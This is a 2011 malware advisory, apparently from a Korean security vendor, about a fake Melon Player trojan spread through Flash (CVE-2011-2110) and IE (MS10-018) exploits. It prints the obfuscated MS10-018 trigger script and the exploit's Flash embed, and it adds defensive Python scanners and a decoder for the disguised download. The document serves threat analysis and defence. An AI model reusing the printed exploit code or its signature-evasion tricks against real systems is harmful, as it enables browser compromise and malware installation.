
6/30/2011

[Warning] A malicious file masquerading as the Melon Player is spreading.

1. Introduction

Recently, a malware-distribution technique that exploits a Flash Player vulnerability to download and execute an additional malicious file has become widespread.
Once a PC is infected with this file, a variety of malicious actions can be carried out on it without the user noticing.
Users therefore need to pay particular attention to this currently spreading malicious file in order to avoid it.



2. Spreading path and symptoms of infection

A malicious file masquerading as the player of a well-known Korean music service is downloaded and installed on the user's PC by a malicious SWF file that exploits a Flash Player vulnerability (CVE-2011-2110).

The initial spread begins with a script inserted into web pages that points to a URL like the one below. That script checks the Internet Explorer and Adobe Flash Player versions and then proceeds accordingly.

* Malicious script that spreads the fake Melon Player malware

- http://(omit)/share/a1.html

* HTML and SWF files containing the malicious script

The following figure shows the internal code of a1.html: a routine that checks the IE and Flash Player versions and then runs the SWF file that matches them.


The following URLs are the list of additional malicious script files that are downloaded.

* URLs of the additional malicious script files

- http://(~~)/share/a1.html
- http://(~~)/share/a2.html (MS10-018 vulnerability)
- http://(~~)/share/a3.html (CVE-2011-2110 vulnerability)

a2.html and a3.html contain code that exploits the MS10-018 vulnerability and the CVE-2011-2110 vulnerability, respectively.


* Exploit for MS10-018 (a2.html)

The string literals are split ("B"+"O"+"D"+"Y") so that simple signature scans do not see the keywords. Once joined, the routine creates a BODY element, attaches the #default#userData behavior to it, and repeatedly passes the window object to setAttribute; this triggers the iepeers.dll memory corruption that MS10-018 fixed (CVE-2010-0806).

function sclick()
{
    // "BODY": the element name is assembled from single characters to evade signatures
    var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
    // "#default#userData": the IE behavior whose setAttribute handling is vulnerable
    zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
    document.appendChild(zmaqwekjsax);
    try
    {
        // passing the window object as an attribute value is what triggers the corruption
        for (i=0;i<10;i++)
        {
            zmaqwekjsax.setAttribute('s',window);
        }
    }
    catch(e)
    {}
    window.status+='';
}

* Exploit for CVE-2011-2110 (a3.html)

The page embeds basic.swf twice: once through the Flash ActiveX classid for Internet Explorer, and once inside a conditional comment through a plain <object type="application/x-shockwave-flash"> for other browsers. The info= query string hands a long hex value to the SWF (the page shows only part of it). The closing tags, which the excerpt cut off, are restored at the end.

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
    <param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
    <param name="quality" value="high" />
    <param name="bgcolor" value="#ffffff" />
    <param name="play" value="true" />
    <param name="loop" value="true" />
    <param name="wmode" value="window" />
    <param name="scale" value="showall" />
    <param name="menu" value="true" />
    <param name="devicefont" value="false" />
    <param name="salign" value="" />
    <param name="allowScriptAccess" value="sameDomain" />
    <!--[if !IE]>-->
    <object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(~~)B7394" width="550" height="400">
        <param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
        <param name="quality" value="high" />
        <param name="bgcolor" value="#ffffff" />
        <param name="play" value="true" />
        <param name="loop" value="true" />
        <param name="wmode" value="window" />
        <param name="scale" value="showall" />
        <param name="menu" value="true" />
        <param name="devicefont" value="false" />
        <param name="salign" value="" />
        <param name="allowScriptAccess" value="sameDomain" />
    </object>
    <!--<![endif]-->
</object>
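As an added example (not code from the original post or from INCA Internet), the following Python script applies the two patterns just shown to page source. It first folds the split string literals ("B"+"O"+"D"+"Y") back together, which is exactly what the obfuscation in a2.html is meant to defeat, then looks for the userData-behavior plus setAttribute(window) pair and for a Flash object whose SWF is loaded with a long hex query parameter. The sample pages, the variable name in them and the info= value are constructed for the test, not the original files.

```python
import re

# Constructed samples that mimic the a2.html / a3.html patterns shown above. They are
# not the original files: the variable name, the split strings and the info= value are made up.
SAMPLE_A2 = '''
function sclick()
{
var q = document.createElement("B"+"O"+"D"+"Y");
q.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(q);
try { for (i=0;i<10;i++) { q.setAttribute('s',window); } } catch(e) {}
window.status+='';
}
'''

SAMPLE_A3 = '''
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test">
<param name="movie" value="basic.swf?info=02E6B0011223344B7394" />
<param name="allowScriptAccess" value="sameDomain" />
</object>
'''

# A normal Flash embed: same classid, but the SWF is loaded without an encoded query string.
BENIGN_FLASH = ('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">'
                '<param name="movie" value="player.swf" /></object>')

# Two adjacent string literals joined by '+', e.g. "B"+"O" -> "BO".
_CONCAT = re.compile(r'''(["'])((?:(?!\1).)*)\1\s*\+\s*(["'])((?:(?!\3).)*)\3''')

def fold_concat(src):
    """Undo "B"+"O"+"D"+"Y" style splitting so keyword matching sees the real strings."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

# Indicators of the two exploit pages, applied after folding.
_USERDATA = re.compile(r'addBehavior\s*\(\s*["\']#default#userData["\']', re.I)
_SETATTR_WINDOW = re.compile(r'setAttribute\s*\(\s*(["\'])[^"\']*\1\s*,\s*window\s*\)', re.I)
_FLASH_CLSID = re.compile(r'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000', re.I)
_SWF_WITH_BLOB = re.compile(r'\.swf\?[^"\']*=[0-9a-f]{8,}', re.I)

def scan_page(src):
    """Return the names of the exploit patterns found in one HTML/JS page."""
    folded = fold_concat(src)
    hits = []
    if _USERDATA.search(folded) and _SETATTR_WINDOW.search(folded):
        hits.append("MS10-018 userData behavior + setAttribute(window)")
    if _FLASH_CLSID.search(folded) and _SWF_WITH_BLOB.search(folded):
        hits.append("Flash object loading SWF with encoded query parameter")
    return hits

if __name__ == "__main__":
    for label, page in (("a2-like", SAMPLE_A2), ("a3-like", SAMPLE_A3), ("benign", BENIGN_FLASH)):
        print(label, scan_page(page))
```

The folding step matters more than the signatures: the same two regular expressions miss the raw a2.html text entirely, because "addBehavior" is never followed by a literal "#default#userData" until the concatenation is collapsed.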


The following figure shows the internal code of the SWF file containing the malicious code that the script triggers, together with the shellcode (which loads the required libraries and downloads the malicious file disguised as Melon Player) and its decoded form.



* Latest Adobe Flash Player security patch
http://www.adobe.com/go/getflash

* Malicious file masquerading as Melon Player 3.0

Finally, the malicious script and the exploit SWF download a file named "fatt.txt". At a glance it looks like a .TXT file, but after a decoding step it becomes an .EXE file capable of infecting the system.

The following image compares the properties of the disguised malicious file with those of the genuine Melon Player 3.0 installer.
 

The genuine Melon Player installer is named "MelonSetup"; it is an integrated installation package and therefore carries no version information.
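Added example (not the page's own decoder): the post does not say how fatt.txt is encoded, so the script below assumes the common case of a single-byte XOR key and recovers it by checking, for each candidate key, whether the decoded bytes start with a DOS header whose e_lfanew field points at the "PE\0\0" signature. Only the header bytes are decoded during the search, so it is cheap even on a file of the stated 239,108 bytes. The sample input is a constructed PE skeleton XOR-ed with 0x5A; neither the real key nor the real file is on the page.

```python
import struct

def _xor(chunk, key):
    return bytes(b ^ key for b in chunk)

def find_xor_key(data):
    """Return the single-byte XOR key under which `data` starts with a valid DOS/PE header,
    0 if it is already a plain executable, or None if no key works.
    Only the DOS header and the 4 bytes at e_lfanew are decoded, so the search is cheap."""
    if len(data) < 0x40:
        return None
    for key in range(256):
        if _xor(data[:2], key) != b"MZ":
            continue
        e_lfanew = struct.unpack("<I", _xor(data[0x3C:0x40], key))[0]
        if e_lfanew + 4 <= len(data) and _xor(data[e_lfanew:e_lfanew + 4], key) == b"PE\x00\x00":
            return key
    return None

def decode(data, key):
    """Decode the whole file once the key is known."""
    return _xor(data, key)

def build_fake_pe():
    """Constructed minimal 'MZ ... PE\\0\\0' skeleton standing in for the decoded executable; not real malware."""
    img = bytearray(b"MZ" + b"\x00" * 0x3E)       # 64-byte DOS header
    struct.pack_into("<I", img, 0x3C, 0x80)       # e_lfanew -> NT headers at offset 0x80
    img += b"\x00" * (0x80 - len(img))
    img += b"PE\x00\x00" + b"\x4c\x01"            # signature, IMAGE_FILE_MACHINE_I386
    img += b"\x00" * 256
    return bytes(img)

# Constructed stand-in for fatt.txt: the skeleton XOR-ed with 0x5A (assumed key; the page gives none).
SAMPLE_FATT = _xor(build_fake_pe(), 0x5A)

def triage(data):
    """Summarise whether a '.txt' download is really an (optionally XOR-encoded) executable."""
    key = find_xor_key(data)
    if key is None:
        return {"hidden_pe": False}
    return {"hidden_pe": True, "key": key, "size": len(data), "decoded_prefix": decode(data, key)[:2]}

if __name__ == "__main__":
    print(triage(SAMPLE_FATT))
```

A key of 0 means the file was simply renamed, which is worth reporting separately from a genuinely encoded download; a result of None only rules out single-byte XOR, not other encodings.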

Once a PC is infected with the decoded "fatt.txt", the malware creates a copy of itself and registers that copy in the registry.
  
* Generated file
- C:\WINDOWS\winntp\cr.exe (239,108 bytes)

* Registered registry value: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Name : HKLM
- Data : "C:\WINDOWS\winntp\cr.exe"
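Added example (not from the original post): a small triage check for the persistence entry above, run against a constructed .reg export of the Run key. It flags values whose name mimics a registry hive, as this sample's value name "HKLM" does, and executables placed in a non-standard subdirectory of %SystemRoot% such as winntp. Only the cr.exe entry comes from the page; the other entries and paths are made up.

```python
import re

# Constructed: what `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg`
# could produce on an infected host. Only the cr.exe entry is from the page; the rest is made up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAX"="C:\\Program Files\\SoundMAX\\SMax4PNP.exe"
"HKLM"="C:\\WINDOWS\\winntp\\cr.exe"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

_ENTRY = re.compile(r'^"([^"]+)"="(.*)"$')
_HIVE_NAMES = {"hklm", "hkcu", "hkey_local_machine", "hkey_current_user"}
_WINDIR_OK = {"system32", "syswow64"}   # %SystemRoot% subdirectories where autostart binaries are expected

def parse_run_entries(reg_text):
    """Return (name, command) pairs from a .reg export, unescaping the doubled backslashes."""
    entries = []
    for line in reg_text.splitlines():
        m = _ENTRY.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries

def _exe_path(command):
    """Strip quotes and arguments, keeping only the executable path."""
    command = command.strip().strip('"')
    idx = command.lower().find(".exe")
    return command[:idx + 4] if idx >= 0 else command

def suspicious_run_entries(entries):
    """Return (name, command, reason) for entries matching the indicators seen in this sample."""
    flagged = []
    for name, command in entries:
        reasons = []
        if name.lower() in _HIVE_NAMES:
            reasons.append("value name mimics a registry hive")
        parts = _exe_path(command).lower().split("\\")
        # e.g. ['c:', 'windows', 'winntp', 'cr.exe']: a binary in a non-standard %SystemRoot% subdirectory
        if len(parts) > 3 and parts[1] == "windows" and parts[2] not in _WINDIR_OK:
            reasons.append("executable under %SystemRoot%\\" + parts[2])
        if reasons:
            flagged.append((name, command, "; ".join(reasons)))
    return flagged

if __name__ == "__main__":
    for hit in suspicious_run_entries(parse_run_entries(SAMPLE_REG)):
        print(hit)
```

The two heuristics are deliberately narrow so that they explain themselves in a report; the path rule should be read together with the file size and hash from the indicators above rather than used alone.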

In addition, once this file runs it can send collected information, download additional malicious files, or act as a backdoor while it keeps a session connected, as shown in the following figure.
  

3. How to prevent

As described above, this type of malware, which steals online game accounts, keeps appearing in numerous variants. It spreads through popular social-commerce sites and other widely used sites, so the scope of infection can be very wide and considerable financial loss and damage can follow.

Because this kind of malicious file spreads without the user noticing, it is especially hard for an ordinary user to tell whether a PC is infected. To stay safe from it, we recommend the following security management tips for general users.
  
Security management tips

1. Keep the operating system and applications up to date with the latest security updates.
2. Use anti-virus software from a trustworthy security company, keep its engine updated, and leave real-time detection enabled.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received through instant messengers and social networking services.

INCA Internet (Security Response Center / Emergency Response Team) provides detection and removal of the malicious files described above, including through nProtect Mobile for Android, and operates a response system against various security threats.

Diagnosis name

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
 
